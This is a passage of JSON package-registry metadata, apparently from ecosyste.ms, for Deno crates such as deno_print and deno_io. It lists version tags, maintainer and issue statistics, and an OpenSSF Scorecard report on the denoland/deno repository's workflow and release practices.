g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:36:49.286Z","dependent_packages_count":0,"downloads":953,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":88.58447186257536,"dependent_repos_count":13.592702189210836,"dependent_packages_count":17.954574040606648,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.04391603079761},"purl":"pkg:cargo/deno_print","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_print","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_print","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_print/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-07-03T14:21:07.265Z","updated_at":"2026-07-03T14:21:07.265Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-07-03T14:21:07.403Z","updated_at":"2026-07-03T14:21:07.403Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":6465894,"name":"deno_io","ecosystem":"cargo","description":"IO primitives for Deno extensions","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":167,"first_release_published_at":"2023-03-03T15:05:13.827Z","latest_release_published_at":"2026-08-06T11:45:42.805Z","latest_release_number":"0.167.0","last_synced_at":"2026-08-29T21:57:26.940Z","created_at":"2023-03-03T15:24:27.352Z","updated_at":"2026-08-29T21:57:26.940Z","registry_url":"https://crates.io/crates/deno_io/","install_command":"cargo install deno_io","documentation_url":"https://docs.rs/deno_io/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not 